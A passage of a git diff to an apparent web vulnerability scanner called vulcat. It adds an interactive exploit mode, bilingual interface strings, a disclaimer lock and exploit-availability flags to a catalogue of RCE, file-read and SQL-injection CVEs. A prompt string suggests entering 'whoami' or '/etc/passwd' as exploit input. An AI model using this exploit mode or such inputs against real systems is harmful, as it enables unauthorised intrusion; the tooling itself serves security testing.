- 'vuln': 'Specify the vulnerability number,With -a/--application to scan a single vulnerability,You can use --list to see the vulnerability number,vulnerabilities that do not have a vulnerability number are not supported.The number does not discriminate between sizes, and the symbol - and _ are acceptable (e.g. -a fastjson -v cnVD-2019-22238 or -a Tomcat -v CVE-2017_12615)'
+ 'vuln': 'Specify the vulnerability number,With -a/--application to scan a single vulnerability,You can use --list to see the vulnerability number,vulnerabilities that do not have a vulnerability number are not supported.The number does not discriminate between sizes, and the symbol - and _ are acceptable (e.g. -a fastjson -v cnVD-2019-22238 or -a Tomcat -v CVE-2017_12615)',
+ 'exp': 'Use with the -a and -v parameters, After the Poc scan, if the vulnerability exists, enter the Exp interaction mode of the vulnerability; You can use --list to see Exp support vulnerabilities. (e.g. -a httpd -v CVE-2021-42013 -x)'
},
'api_help': {
'title': 'Api',
@@ -74,14 +75,15 @@ def language():
},
'app_list_help': {
'title': 'Supported target types(Case insensitive)',
- 'name': 'AliDruid, airflow, apisix, appweb, cisco, confluence, discuz, django, drupal, elasticsearch, f5bigip, fastjson, flink, gitea, gitlab, grafana, influxdb, hadoop, httpd, jenkins, jetty, jupyter, keycloak, landray, minihttpd, mongoexpress, nexus, nacos, nodejs, nodered, phpmyadmin, phpunit, rails, showdoc, solr, struts2, spring, skywalking, thinkphp, tomcat, ueditor, weblogic, webmin, yonyou'
+ 'name': 'AliDruid, airflow, apisix, appweb, cisco, confluence, discuz, django, drupal, elasticsearch, f5bigip, fastjson, flink, gitea, gitlab, grafana, influxdb, hadoop, httpd, jenkins, jetty, jupyter, keycloak, landray, minihttpd, mongoexpress, nexus, nacos, nodejs, nodered, phpmyadmin, phpunit, rails, showdoc, solr, spring, supervisor, skywalking, thinkphp, tomcat, ueditor, weblogic, webmin, yonyou'
},
'core': {
'start': {
'start': '[INFO] Start scanning target ',
'unable': '[WARN] Unable to connect to ',
'url_error': '[WARN] The destination {} is incorrect and needs to start with http:// or https://',
- 'no_poc': '[No-POC] Disable Vulnerability scanning'
+ 'no_poc': '[No-POC] Disable Vulnerability scanning',
+ 'exp': 'When using -x/--exp, specify a vulnerability with -a and -v first(e.g. -a httpd -v cve-2021-41773 -x)'
},
'waf_finger': {
'waf': '[INFO] The WAF detection for the current URL starts',
@@ -114,6 +116,9 @@ def language():
'end': {
'wait': '[INFO] Wait for all threads to finish. Please wait...',
'completed': '[INFO] Scan is completed'
+ },
+ 'start_exp': {
+ 'lock': 'If you want to use -x/--exp, Please read the "vulcat/Exploit.lock" statement first, Delete the file with consent to the declaration, After the deletion, run -x/--exp again'
}
},
'output': {
@@ -173,7 +178,8 @@ def language():
'title': 'Application',
'name': '指定扫描的目标类型',
'application': '指定框架类型, 支持的框架可以参考最下面的提示信息, 多个使用逗号分隔 (如: thinkphp 或者 thinkphp,weblogic) (默认将启用指纹识别, 并使用相应POC, 如果未识别出框架则使用全部POC)',
- 'vuln': '指定漏洞编号, 配合-a/--application对单个漏洞进行扫描, 可以使用--list查看漏洞编号, 没有漏洞编号的漏洞暂不支持, 编号不区分大小, 符号-和_皆可 (如: -a fastjson -v CNVD-2019-22238 或者 -a Tomcat -v cvE-2017_12615)'
+ 'vuln': '指定漏洞编号, 配合-a/--application对单个漏洞进行扫描, 可以使用--list查看漏洞编号, 没有漏洞编号的漏洞暂不支持, 编号不区分大小, 符号-和_皆可 (如: -a fastjson -v CNVD-2019-22238 或者 -a Tomcat -v cvE-2017_12615)',
+ 'exp': '配合-a和-v参数进行使用, Poc扫描过后, 如果该漏洞存在, 则进入该漏洞的Exp交互模式; 可以使用--list查看支持Exp的漏洞(如: -a httpd -v CVE-2021-42013 -x)'
},
'api_help': {
'title': 'Api',
@@ -200,14 +206,15 @@ def language():
},
'app_list_help': {
'title': '支持的目标类型(-a参数, 不区分大小写)',
- 'name': 'AliDruid, airflow, apisix, appweb, cisco, confluence, discuz, django, drupal, elasticsearch, f5bigip, fastjson, flink, gitea, gitlab, grafana, influxdb, hadoop, httpd, jenkins, jetty, jupyter, keycloak, landray, minihttpd, mongoexpress, nexus, nacos, nodejs, nodered, phpmyadmin, phpunit, rails, showdoc, solr, struts2, spring, skywalking, thinkphp, tomcat, ueditor, weblogic, webmin, yonyou'
+ 'name': 'AliDruid, airflow, apisix, appweb, cisco, confluence, discuz, django, drupal, elasticsearch, f5bigip, fastjson, flink, gitea, gitlab, grafana, influxdb, hadoop, httpd, jenkins, jetty, jupyter, keycloak, landray, minihttpd, mongoexpress, nexus, nacos, nodejs, nodered, phpmyadmin, phpunit, rails, showdoc, solr, spring, supervisor, skywalking, thinkphp, tomcat, ueditor, weblogic, webmin, yonyou'
},
'core': {
'start': {
'start': '[INFO] 开始扫描目标 ',
'unable': '[WARN] 无法连接到 ',
'url_error': '[WARN] 目标{}好像不对哦, 需要以http://或https://开头',
- 'no_poc': '[No-POC] 不进行漏洞扫描'
+ 'no_poc': '[No-POC] 不进行漏洞扫描',
+ 'exp': '使用-x/--exp时请先使用-a和-v指定一个漏洞, 例如-a httpd -v cve-2021-41773 -x'
},
'waf_finger': {
'waf': '[INFO] 对当前url进行WAF检测, 请稍等...',
@@ -240,6 +247,9 @@ def language():
'end': {
'wait': '[INFO] 等待所有线程结束, 请稍等...',
'completed': '[INFO] 扫描完成'
+ },
+ 'start_exp': {
+ 'lock': '如果要使用-x/--exp, 请先阅读"vulcat/Exploit.lock"文件中的声明, 在同意声明的情况下删除该文件, 删除之后再次运行-x/--exp'
}
},
'output': {
@@ -267,6 +277,9 @@ def language():
}
}
+lang['en_us']['disclaimer'] = '''By using this tool, you agree to the "Code of Conduct and Disclaimer" in "vulcat/README.md; If you do not agree, do not use this tool."\n\n\n'''
+lang['zh_cn']['disclaimer'] = '''使用本工具, 代表您同意"vulcat/README.zh-cn.md"中的"行为规范和免责声明"; 如果您不同意, 请勿使用本工具\n\n\n'''
+
# * --list的中文
lang['zh_cn']['list'] = {
'Alibaba Druid': '阿里巴巴Druid未授权访问',
@@ -276,7 +289,7 @@ def language():
'Apache Flink': {'CVE-2020-17519': 'Flink目录遍历',},
'Apache Hadoop': 'Hadoop YARN ResourceManager 未授权访问',
'Apache Httpd': {
- 'CVE-2021-40438': 'Apache HTTP Server 2.4.48 mod_proxy SSRF ',
+ 'CVE-2021-40438': 'Apache HTTP Server 2.4.48 mod_proxy SSRF ',
'CVE-2021-41773': 'Apache HTTP Server 2.4.49 路径遍历',
'CVE-2021-42013': 'Apache HTTP Server 2.4.50 路径遍历',
},
@@ -286,14 +299,6 @@ def language():
'CVE-2019-17558': 'Solr Velocity 注入远程命令执行',
'CVE-2021-27905': 'Solr SSRF/任意文件读取',
},
- 'Apache Struts2': {
- 'S2-001': 'Struts2远程代码执行',
- 'S2-005': 'Struts2远程代码执行',
- 'S2-007': 'Struts2远程代码执行',
- 'S2-008': 'Struts2远程代码执行',
- 'S2-009': 'Struts2远程代码执行',
- 'S2-012': 'Struts2远程代码执行',
- },
'Apache Tomcat': {'CVE-2017-12615': 'PUT方法任意文件写入',},
'AppWeb': {'CVE-2018-8715': 'AppWeb身份认证绕过',},
'Atlassian Confluence': {
@@ -382,6 +387,9 @@ def language():
'CVE-2022-22963': 'Spring Cloud Function SpEL远程代码执行',
'CVE-2022-22965': 'Spring Framework远程代码执行',
},
+ 'Supervisor': {
+ 'CVE-2017-11610': 'Supervisor 远程命令执行'
+ },
'ThinkPHP': {
'CVE-2018-1002015': 'ThinkPHP5.x 远程代码执行',
'CNVD-2018-24942': '未开启强制路由导致RCE',
@@ -428,17 +436,9 @@ def language():
'Apache SkyWalking': {'CVE-2020-9483': 'SkyWalking SQLinject',},
'Apache Solr': {
'CVE-2017-12629': 'Solr Remote code execution',
- 'CVE-2019-17558': 'Solr Remote Code Execution Via Velocity Custom Template',
+ 'CVE-2019-17558': 'Solr RCE Via Velocity Custom Template',
'CVE-2021-27905': 'Solr SSRF/FileRead',
},
- 'Apache Struts2': {
- 'S2-001': 'Apache Struts2 Remote code execution',
- 'S2-005': 'Apache Struts2 Remote code execution',
- 'S2-007': 'Apache Struts2 Remote code execution',
- 'S2-008': 'Apache Struts2 Remote code execution',
- 'S2-009': 'Apache Struts2 Remote code execution',
- 'S2-012': 'Apache Struts2 Remote code execution',
- },
'Apache Tomcat': {'CVE-2017-12615': 'Put method writes to any file',},
'AppWeb': {'CVE-2018-8715': 'AppWeb Authentication bypass',},
'Atlassian Confluence': {
@@ -527,9 +527,12 @@ def language():
'CVE-2022-22963': 'Spring Cloud Function SpEL Remote code execution',
'CVE-2022-22965': 'Spring Framework Remote code execution',
},
+ 'Supervisor': {
+ 'CVE-2017-11610': 'Supervisor Remote Command Execution'
+ },
'ThinkPHP': {
'CVE-2018-1002015': 'ThinkPHP5.x Remote code execution',
- 'CNVD-2018-24942': 'The forced route is not enabled Remote code execution',
+ 'CNVD-2018-24942': 'The forced route is not enabled RCE',
'CNNVD-201901-445': 'Core class Request Remote code execution',
'2.x RCE': 'ThinkPHP2.x Remote code execution',
'5 ids sqlinject': 'ThinkPHP5 ids SQLinject',
@@ -550,7 +553,40 @@ def language():
'CNNVD-201610-923': 'Yonyou-GRP-U8 Proxy SQLinject',
'CNVD-2021-30167': 'Yonyou-NC BeanShell Remote code execution',
'NCFindWeb': 'Yonyou-ERP-NC NCFindWeb Directory traversal',
- 'getSessionList.jsp': 'Yonyou-U8-OA getSessionList.jsp Disclosure information',
+ 'getSessionList.jsp': 'Yonyou-U8-OA getSessionList.jsp Disclosure info',
'test.jsp': 'Yonyou-U8-OA test.jsp SQLinject',
}
-}
\ No newline at end of file
+}
+
+# ! -x/--exp中文------------------------------------------------------------
+
+lang['zh_cn']['exploit'] = {
+ 'identify': '[+] 识别为"{}"漏洞, 进入Exp交互模式:',
+ 'not_exp': '[-] 没有识别到漏洞类型, 或该漏洞类型不支持Exp',
+ 'not_request': '[-] POC结果没有返回Request(HTTP请求数据包), 无法使用Exp',
+ 'input_command': '根据漏洞类型 输入相应的内容(例如"whoami"或"/etc/passwd"): ',
+ 'not_command': '请输入命令 (可以输入“exit”退出)',
+ 'faild_command': '[Faild] 使用该命令时发生错误',
+ 'not_search_command': '[INFO] 替换新payload失败, 没有在旧的HTTP数据包中检测到旧的payload',
+ 'exit': '[INFO] 退出Exploit模式',
+ 'exp_faild': '[Exploit] 请求失败',
+ 'not_response': '没有检测到响应包中的回显内容',
+ 're_error': 'vcsearch语法错误: 错误的正则表达式',
+}
+
+# ! -x/--exp英文------------------------------------------------------------
+lang['en_us']['exploit'] = {
+ 'identify': '[+] Identified as "{}" vulnerability, Enter the Exp interactive mode:',
+ 'not_exp': '[-] The vulnerability type is not identified, or Exp is not supported by the vulnerability type',
+ 'not_request': '[-] The poc result did not return the Request(HTTP Request), Unable to use Exp',
+ 'input_command': 'Enter the value according to the vulnerability type(e.g. "whoami"or"/etc/passwd"): ',
+ 'not_command': 'Please enter the command(You can enter "exit" to exit)',
+ 'faild_command': '[Faild] An error occurred while using the command',
+ 'not_search_command': '[INFO] Description Failed to replace the new payload, No old payload was detected in the old HTTP packet',
+ 'exit': '[INFO] Exit the Exploit.',
+ 'exp_faild': '[Exploit] Request failed',
+ 'not_response': 'Echoes in response packets are not detected',
+ 're_error': 'vcsearch syntax error: Incorrect regular expression',
+}
+
+
diff --git a/lib/initial/list.py b/lib/initial/list.py
index 7890ba1..d6cc4ae 100644
--- a/lib/initial/list.py
+++ b/lib/initial/list.py
@@ -6,45 +6,53 @@
import sys
list_lang = language()['list']
-description_t = '\t' # * 中英文标题的长度不一样, 中文需要添加一个\t才能对齐
+description_t = '\t\t' # * 中英文标题的长度不一样, 中文需要添加\t才能对齐
# * ---横线长度---
Target_len_ = '-' * 22
Vul_id_len_ = '-' * 20
Type_len_ = '-' * 14
-Description_len_ = '-' * 68
+Exp_len_ = '-' * 5
+Description_len_ = '-' * 70
# * 中英文长度的处理
if ('Alibaba Druid unAuthorized' in list_lang['Alibaba Druid']):
- Description_len_ = '-' * 60
+ Description_len_ = '-' * 62
description_t = ''
def list():
''' 显示漏洞列表 '''
vul_num = 0
+ exp_num = 0
vul_list = ''
- vul_list += '+' + Target_len_ + '+' + Vul_id_len_ + '+' + Type_len_ + '+' + Description_len_ + '+\n'
+ vul_list += '+' + Target_len_ + '+' + Vul_id_len_ + '+' + Type_len_ + '+' + Exp_len_ + '+' + Description_len_ + '+\n'
for vul in vul_info:
for info in vul_info[vul]:
vul_num += 1
+ if info['exp'] == 'Y':
+ exp_num += 1
vul_list += '| {}|'.format(vul.ljust(21))
vul_list += ' {}|'.format(info['vul_id'].ljust(19))
vul_list += ' {}|'.format(info['type'].ljust(13))
- vul_list += ' {}\t|'.format(info['description'].ljust(57))
+ vul_list += ' {}|'.format(info['exp'].center(4))
+ vul_list += ' {}\t\t|'.format(info['description'].ljust(51))
vul_list += '\n'
- vul_list += '+' + Target_len_ + '+' + Vul_id_len_ + '+' + Type_len_ + '+' + Description_len_ + '+\n'
+ vul_list += '+' + Target_len_ + '+' + Vul_id_len_ + '+' + Type_len_ + '+' + Exp_len_ + '+' + Description_len_ + '+\n'
- print(color.cyan(vul_list + str(vul_num - 1) + '/vulcat-1.1.4/2022.10'))
+ print(color.cyan(vul_list + 'vulcat-1.1.5/2022.11')) # * 2022-11-09_20:52
+ print(color.cyan(str(vul_num - 1) + '/Poc')) # * 有一个是标题, 所以要-1
+ print(color.cyan(str(exp_num) + '/Exp'))
# print(vul_num)
sys.exit(0)
vul_info = {
'Target': [
{
- 'vul_id': 'Vul_id',
- 'type': 'Type',
+ 'vul_id': 'Vuln id',
+ 'type': 'Vuln Type',
+ 'exp': 'Exp',
'description': 'Description' + description_t
}
],
@@ -52,6 +60,7 @@ def list():
{
'vul_id': 'None',
'type': 'unAuth',
+ 'exp': '-',
'description': list_lang['Alibaba Druid']
}
],
@@ -59,6 +68,7 @@ def list():
{
'vul_id': 'CVE-2021-29441',
'type': 'unAuth',
+ 'exp': '-',
'description': list_lang['Alibaba Nacos']['CVE-2021-29441']
}
],
@@ -66,6 +76,7 @@ def list():
{
'vul_id': 'CVE-2020-17526',
'type': 'unAuth',
+ 'exp': '-',
'description': list_lang['Apache Airflow']['CVE-2020-17526']
}
],
@@ -73,6 +84,7 @@ def list():
{
'vul_id': 'CVE-2020-13945',
'type': 'unAuth',
+ 'exp': '-',
'description': list_lang['Apache APISIX']['CVE-2020-13945']
}
],
@@ -80,6 +92,7 @@ def list():
{
'vul_id': 'CVE-2020-17519',
'type': 'FileRead',
+ 'exp': 'Y',
'description': list_lang['Apache Flink']['CVE-2020-17519']
}
],
@@ -87,6 +100,7 @@ def list():
{
'vul_id': 'None',
'type': 'unAuth',
+ 'exp': '-',
'description': list_lang['Apache Hadoop']
}
],
@@ -94,16 +108,19 @@ def list():
{
'vul_id': 'CVE-2021-40438',
'type': 'SSRF',
+ 'exp': '-',
'description': list_lang['Apache Httpd']['CVE-2021-40438']
},
{
'vul_id': 'CVE-2021-41773',
'type': 'FileRead/RCE',
+ 'exp': 'Y',
'description': list_lang['Apache Httpd']['CVE-2021-41773']
},
{
'vul_id': 'CVE-2021-42013',
'type': 'FileRead/RCE',
+ 'exp': 'Y',
'description': list_lang['Apache Httpd']['CVE-2021-42013']
}
],
@@ -111,6 +128,7 @@ def list():
{
'vul_id': 'CVE-2020-9483',
'type': 'SQLinject',
+ 'exp': '-',
'description': list_lang['Apache SkyWalking']['CVE-2020-9483']
}
],
@@ -118,55 +136,27 @@ def list():
{
'vul_id': 'CVE-2017-12629',
'type': 'RCE',
+ 'exp': '-',
'description': list_lang['Apache Solr']['CVE-2017-12629']
},
{
'vul_id': 'CVE-2019-17558',
'type': 'RCE',
+ 'exp': 'Y',
'description': list_lang['Apache Solr']['CVE-2019-17558']
},
{
'vul_id': 'CVE-2021-27905',
- 'type': 'SSRF',
+ 'type': 'SSRF/FileRead',
+ 'exp': 'Y',
'description': list_lang['Apache Solr']['CVE-2021-27905']
},
],
- 'Apache Struts2': [
- {
- 'vul_id': 'S2-001',
- 'type': 'RCE',
- 'description': list_lang['Apache Struts2']['S2-001']
- },
- {
- 'vul_id': 'S2-005',
- 'type': 'RCE',
- 'description': list_lang['Apache Struts2']['S2-005']
- },
- {
- 'vul_id': 'S2-007',
- 'type': 'RCE',
- 'description': list_lang['Apache Struts2']['S2-007']
- },
- {
- 'vul_id': 'S2-008',
- 'type': 'RCE',
- 'description': list_lang['Apache Struts2']['S2-008']
- },
- {
- 'vul_id': 'S2-009',
- 'type': 'RCE',
- 'description': list_lang['Apache Struts2']['S2-009']
- },
- {
- 'vul_id': 'S2-012',
- 'type': 'RCE',
- 'description': list_lang['Apache Struts2']['S2-012']
- }
- ],
'Apache Tomcat': [
{
'vul_id': 'CVE-2017-12615',
'type': 'FileUpload',
+ 'exp': '-',
'description': list_lang['Apache Tomcat']['CVE-2017-12615']
}
],
@@ -174,6 +164,7 @@ def list():
{
'vul_id': 'CVE-2018-8715',
'type': 'unAuth',
+ 'exp': '-',
'description': list_lang['AppWeb']['CVE-2018-8715']
}
],
@@ -181,21 +172,25 @@ def list():
{
'vul_id': 'CVE-2015-8399',
'type': 'FileRead',
+ 'exp': 'Y',
'description': list_lang['Atlassian Confluence']['CVE-2015-8399']
},
{
'vul_id': 'CVE-2019-3396',
- 'type': 'RCE/FileRead',
+ 'type': 'FileRead',
+ 'exp': 'Y',
'description': list_lang['Atlassian Confluence']['CVE-2019-3396']
},
{
'vul_id': 'CVE-2021-26084',
'type': 'RCE',
+ 'exp': 'Y',
'description': list_lang['Atlassian Confluence']['CVE-2021-26084']
},
{
'vul_id': 'CVE-2022-26134',
'type': 'RCE',
+ 'exp': 'Y',
'description': list_lang['Atlassian Confluence']['CVE-2022-26134']
}
],
@@ -203,6 +198,7 @@ def list():
{
'vul_id': 'CVE-2020-3580',
'type': 'XSS',
+ 'exp': '-',
'description': list_lang['Cisco']['CVE-2020-3580']
}
],
@@ -210,6 +206,7 @@ def list():
{
'vul_id': 'wooyun-2010-080723',
'type': 'RCE',
+ 'exp': 'Y',
'description': list_lang['Discuz']['wooyun-2010-080723']
}
],
@@ -217,26 +214,31 @@ def list():
{
'vul_id': 'CVE-2017-12794',
'type': 'XSS',
+ 'exp': '-',
'description': list_lang['Django']['CVE-2017-12794']
},
{
'vul_id': 'CVE-2018-14574',
'type': 'Redirect',
+ 'exp': '-',
'description': list_lang['Django']['CVE-2018-14574']
},
{
'vul_id': 'CVE-2019-14234',
'type': 'SQLinject',
+ 'exp': '-',
'description': list_lang['Django']['CVE-2019-14234']
},
{
'vul_id': 'CVE-2020-9402',
'type': 'SQLinject',
+ 'exp': '-',
'description': list_lang['Django']['CVE-2020-9402']
},
{
'vul_id': 'CVE-2021-35042',
'type': 'SQLinject',
+ 'exp': '-',
'description': list_lang['Django']['CVE-2021-35042']
}
],
@@ -244,21 +246,25 @@ def list():
{
'vul_id': 'CVE-2014-3704',
'type': 'SQLinject',
+ 'exp': '-',
'description': list_lang['Drupal']['CVE-2014-3704']
},
{
'vul_id': 'CVE-2017-6920',
'type': 'RCE',
+ 'exp': '-',
'description': list_lang['Drupal']['CVE-2017-6920']
},
{
'vul_id': 'CVE-2018-7600',
'type': 'RCE',
+ 'exp': 'Y',
'description': list_lang['Drupal']['CVE-2018-7600']
},
{
'vul_id': 'CVE-2018-7602',
'type': 'RCE',
+ 'exp': '-',
'description': list_lang['Drupal']['CVE-2018-7602']
}
],
@@ -266,21 +272,25 @@ def list():
{
'vul_id': 'CVE-2014-3120',
'type': 'RCE',
+ 'exp': 'Y',
'description': list_lang['ElasticSearch']['CVE-2014-3120']
},
{
'vul_id': 'CVE-2015-1427',
'type': 'RCE',
+ 'exp': 'Y',
'description': list_lang['ElasticSearch']['CVE-2015-1427']
},
{
'vul_id': 'CVE-2015-3337',
'type': 'FileRead',
+ 'exp': 'Y',
'description': list_lang['ElasticSearch']['CVE-2015-3337']
},
{
'vul_id': 'CVE-2015-5531',
'type': 'FileRead',
+ 'exp': 'Y',
'description': list_lang['ElasticSearch']['CVE-2015-5531']
},
],
@@ -288,11 +298,13 @@ def list():
{
'vul_id': 'CVE-2020-5902',
'type': 'RCE',
+ 'exp': '-',
'description': list_lang['F5 BIG-IP']['CVE-2020-5902']
},
{
'vul_id': 'CVE-2022-1388',
- 'type': 'unAuth',
+ 'type': 'unAuth/RCE',
+ 'exp': 'Y',
'description': list_lang['F5 BIG-IP']['CVE-2020-5902']
}
],
@@ -300,11 +312,13 @@ def list():
{
'vul_id': 'CNVD-2017-02833',
'type': 'unSerialize',
+ 'exp': '-',
'description': list_lang['Fastjson']['CNVD-2017-02833']
},
{
'vul_id': 'CNVD-2019-22238',
'type': 'unSerialize',
+ 'exp': '-',
'description': list_lang['Fastjson']['CNVD-2019-22238']
}
],
@@ -312,6 +326,7 @@ def list():
{
'vul_id': 'None',
'type': 'unAuth',
+ 'exp': '-',
'description': list_lang['Gitea']
},
],
@@ -319,11 +334,13 @@ def list():
{
'vul_id': 'CVE-2021-22205',
'type': 'RCE',
+ 'exp': '-',
'description': list_lang['Gitlab']['CVE-2021-22205']
},
{
'vul_id': 'CVE-2021-22214',
'type': 'SSRF',
+ 'exp': '-',
'description': list_lang['Gitlab']['CVE-2021-22214']
}
],
@@ -331,6 +348,7 @@ def list():
{
'vul_id': 'CVE-2021-43798',
'type': 'FileRead',
+ 'exp': 'Y',
'description': list_lang['Grafana']['CVE-2021-43798']
},
],
@@ -338,6 +356,7 @@ def list():
{
'vul_id': 'None',
'type': 'unAuth',
+ 'exp': '-',
'description': list_lang['Influxdb']
},
],
@@ -345,6 +364,7 @@ def list():
{
'vul_id': 'CVE-2018-1000861',
'type': 'RCE',
+ 'exp': '-',
'description': list_lang['Jenkins']['CVE-2018-1000861']
}
],
@@ -352,16 +372,19 @@ def list():
{
'vul_id': 'CVE-2021-28164',
'type': 'DSinfo',
+ 'exp': '-',
'description': list_lang['Jetty']['CVE-2021-28164']
},
{
'vul_id': 'CVE-2021-28169',
'type': 'DSinfo',
+ 'exp': '-',
'description': list_lang['Jetty']['CVE-2021-28169']
},
{
'vul_id': 'CVE-2021-34429',
'type': 'DSinfo',
+ 'exp': '-',
'description': list_lang['Jetty']['CVE-2021-34429']
}
],
@@ -369,6 +392,7 @@ def list():
{
'vul_id': 'None',
'type': 'unAuth',
+ 'exp': '-',
'description': list_lang['Jupyter']
}
],
@@ -376,6 +400,7 @@ def list():
{
'vul_id': 'CVE-2020-10770',
'type': 'SSRF',
+ 'exp': '-',
'description': list_lang['Keycloak']['CVE-2020-10770']
}
],
@@ -391,6 +416,7 @@ def list():
{
'vul_id': 'CNVD-2021-28277',
'type': 'FileRead/SSRF',
+ 'exp': 'Y',
'description': list_lang['Landray']['CNVD-2021-28277']
}
],
@@ -398,6 +424,7 @@ def list():
{
'vul_id': 'CVE-2018-18778',
'type': 'FileRead',
+ 'exp': '-',
'description': list_lang['Mini Httpd']['CVE-2018-18778']
}
],
@@ -405,6 +432,7 @@ def list():
{
'vul_id': 'CVE-2019-10758',
'type': 'RCE',
+ 'exp': '-',
'description': list_lang['mongo-express']['CVE-2019-10758']
}
],
@@ -412,26 +440,31 @@ def list():
{
'vul_id': 'CVE-2019-5475',
'type': 'RCE',
+ 'exp': 'Y',
'description': list_lang['Nexus Repository']['CVE-2019-5475']
},
{
'vul_id': 'CVE-2019-7238',
'type': 'RCE',
+ 'exp': '-',
'description': list_lang['Nexus Repository']['CVE-2019-7238']
},
{
'vul_id': 'CVE-2019-15588',
'type': 'RCE',
+ 'exp': 'Y',
'description': list_lang['Nexus Repository']['CVE-2019-15588']
},
{
'vul_id': 'CVE-2020-10199',
'type': 'RCE',
+ 'exp': '-',
'description': list_lang['Nexus Repository']['CVE-2020-10199']
},
{
'vul_id': 'CVE-2020-10204',
'type': 'RCE',
+ 'exp': '-',
'description': list_lang['Nexus Repository']['CVE-2020-10204']
}
],
@@ -439,11 +472,13 @@ def list():
{
'vul_id': 'CVE-2017-14849',
'type': 'FileRead',
+ 'exp': 'Y',
'description': list_lang['Nodejs']['CVE-2017-14849']
},
{
'vul_id': 'CVE-2021-21315',
'type': 'RCE',
+ 'exp': '-',
'description': list_lang['Nodejs']['CVE-2021-21315']
}
],
@@ -451,6 +486,7 @@ def list():
{
'vul_id': 'CVE-2021-3223',
'type': 'FileRead',
+ 'exp': 'Y',
'description': list_lang['NodeRED']['CVE-2021-3223']
}
],
@@ -458,11 +494,13 @@ def list():
{
'vul_id': 'WooYun-2016-199433',
'type': 'unSerialize',
+ 'exp': '-',
'description': list_lang['phpMyadmin']['WooYun-2016-199433']
},
{
'vul_id': 'CVE-2018-12613',
'type': 'FileInclude',
+ 'exp': 'Y',
'description': list_lang['phpMyadmin']['CVE-2018-12613']
},
],
@@ -470,6 +508,7 @@ def list():
{
'vul_id': 'CVE-2017-9841',
'type': 'RCE',
+ 'exp': 'Y',
'description': list_lang['PHPUnit']['CVE-2017-9841']
}
],
@@ -477,16 +516,19 @@ def list():
{
'vul_id': 'CVE-2018-3760',
'type': 'FileRead',
+ 'exp': 'Y',
'description': list_lang['Ruby on Rails']['CVE-2018-3760']
},
{
'vul_id': 'CVE-2019-5418',
'type': 'FileRead',
+ 'exp': 'Y',
'description': list_lang['Ruby on Rails']['CVE-2019-5418']
},
{
'vul_id': 'CVE-2020-8163',
'type': 'RCE',
+ 'exp': '-',
'description': list_lang['Ruby on Rails']['CVE-2020-8163']
}
],
@@ -494,6 +536,7 @@ def list():
{
'vul_id': 'CNVD-2020-26585',
'type': 'FileUpload',
+ 'exp': '-',
'description': list_lang['ShowDoc']['CNVD-2020-26585']
}
],
@@ -501,68 +544,89 @@ def list():
{
'vul_id': 'CVE-2016-4977',
'type': 'RCE',
+ 'exp': '-',
'description': list_lang['Spring']['CVE-2016-4977']
},
{
'vul_id': 'CVE-2017-8046',
'type': 'RCE',
+ 'exp': '-',
'description': list_lang['Spring']['CVE-2017-8046']
},
{
'vul_id': 'CVE-2018-1273',
'type': 'RCE',
+ 'exp': '-',
'description': list_lang['Spring']['CVE-2018-1273']
},
{
'vul_id': 'CVE-2020-5410',
'type': 'FileRead',
+ 'exp': 'Y',
'description': list_lang['Spring']['CVE-2020-5410']
},
{
'vul_id': 'CVE-2021-21234',
'type': 'FileRead',
+ 'exp': 'Y',
'description': list_lang['Spring']['CVE-2021-21234']
},
{
'vul_id': 'CVE-2022-22947',
'type': 'RCE',
+ 'exp': '-',
'description': list_lang['Spring']['CVE-2022-22947']
},
{
'vul_id': 'CVE-2022-22963',
'type': 'RCE',
+ 'exp': '-',
'description': list_lang['Spring']['CVE-2022-22963']
},
{
'vul_id': 'CVE-2022-22965',
'type': 'RCE',
+ 'exp': '-',
'description': list_lang['Spring']['CVE-2022-22965']
},
],
+ 'Supervisor': [
+ {
+ 'vul_id': 'CVE-2017-11610',
+ 'type': 'RCE',
+ 'exp': '-',
+ 'description': list_lang['Supervisor']['CVE-2017-11610']
+ }
+ ],
'ThinkPHP': [
{
'vul_id': 'CVE-2018-1002015',
'type': 'RCE',
+ 'exp': 'Y',
'description': list_lang['ThinkPHP']['CVE-2018-1002015']
},
{
'vul_id': 'CNVD-2018-24942',
'type': 'RCE',
+ 'exp': 'Y',
'description': list_lang['ThinkPHP']['CNVD-2018-24942']
},
{
'vul_id': 'CNNVD-201901-445',
'type': 'RCE',
+ 'exp': 'Y',
'description': list_lang['ThinkPHP']['CNNVD-201901-445']
},
{
'vul_id': 'None',
'type': 'RCE',
+ 'exp': '-',
'description': list_lang['ThinkPHP']['2.x RCE']
},
{
'vul_id': 'None',
'type': 'SQLinject',
+ 'exp': '-',
'description': list_lang['ThinkPHP']['5 ids sqlinject']
}
],
@@ -570,6 +634,7 @@ def list():
{
'vul_id': 'None',
'type': 'SSRF',
+ 'exp': '-',
'description': list_lang['Ueditor']
}
],
@@ -577,26 +642,31 @@ def list():
{
'vul_id': 'CVE-2014-4210',
'type': 'SSRF',
+ 'exp': '-',
'description': list_lang['Oracle Weblogic']['CVE-2014-4210']
},
{
'vul_id': 'CVE-2017-10271',
'type': 'unSerialize',
+ 'exp': '-',
'description': list_lang['Oracle Weblogic']['CVE-2017-10271']
},
{
'vul_id': 'CVE-2019-2725',
'type': 'unSerialize',
+ 'exp': '-',
'description': list_lang['Oracle Weblogic']['CVE-2019-2725']
},
{
'vul_id': 'CVE-2020-14750',
'type': 'unAuth',
+ 'exp': '-',
'description': list_lang['Oracle Weblogic']['CVE-2020-14750']
},
{
'vul_id': 'CVE-2020-14882',
'type': 'RCE',
+ 'exp': '-',
'description': list_lang['Oracle Weblogic']['CVE-2020-14882']
}
],
@@ -604,11 +674,13 @@ def list():
{
'vul_id': 'CVE-2019-15107',
'type': 'RCE',
+ 'exp': 'Y',
'description': list_lang['Webmin']['CVE-2019-15107']
},
{
'vul_id': 'CVE-2019-15642',
'type': 'RCE',
+ 'exp': 'Y',
'description': list_lang['Webmin']['CVE-2019-15642']
}
],
@@ -616,26 +688,31 @@ def list():
{
'vul_id': 'CNNVD-201610-923',
'type': 'SQLinject',
+ 'exp': '-',
'description': list_lang['Yonyou']['CNNVD-201610-923']
},
{
'vul_id': 'CNVD-2021-30167',
'type': 'RCE',
+ 'exp': 'Y',
'description': list_lang['Yonyou']['CNVD-2021-30167']
},
{
'vul_id': 'None',
'type': 'FileRead',
+ 'exp': '-',
'description': list_lang['Yonyou']['NCFindWeb']
},
{
'vul_id': 'None',
'type': 'DSinfo',
+ 'exp': '-',
'description': list_lang['Yonyou']['getSessionList.jsp']
},
{
'vul_id': 'None',
'type': 'SQLinject',
+ 'exp': '-',
'description': list_lang['Yonyou']['test.jsp']
}
]
diff --git a/lib/initial/parse.py b/lib/initial/parse.py
index d159fd4..b7b2d96 100644
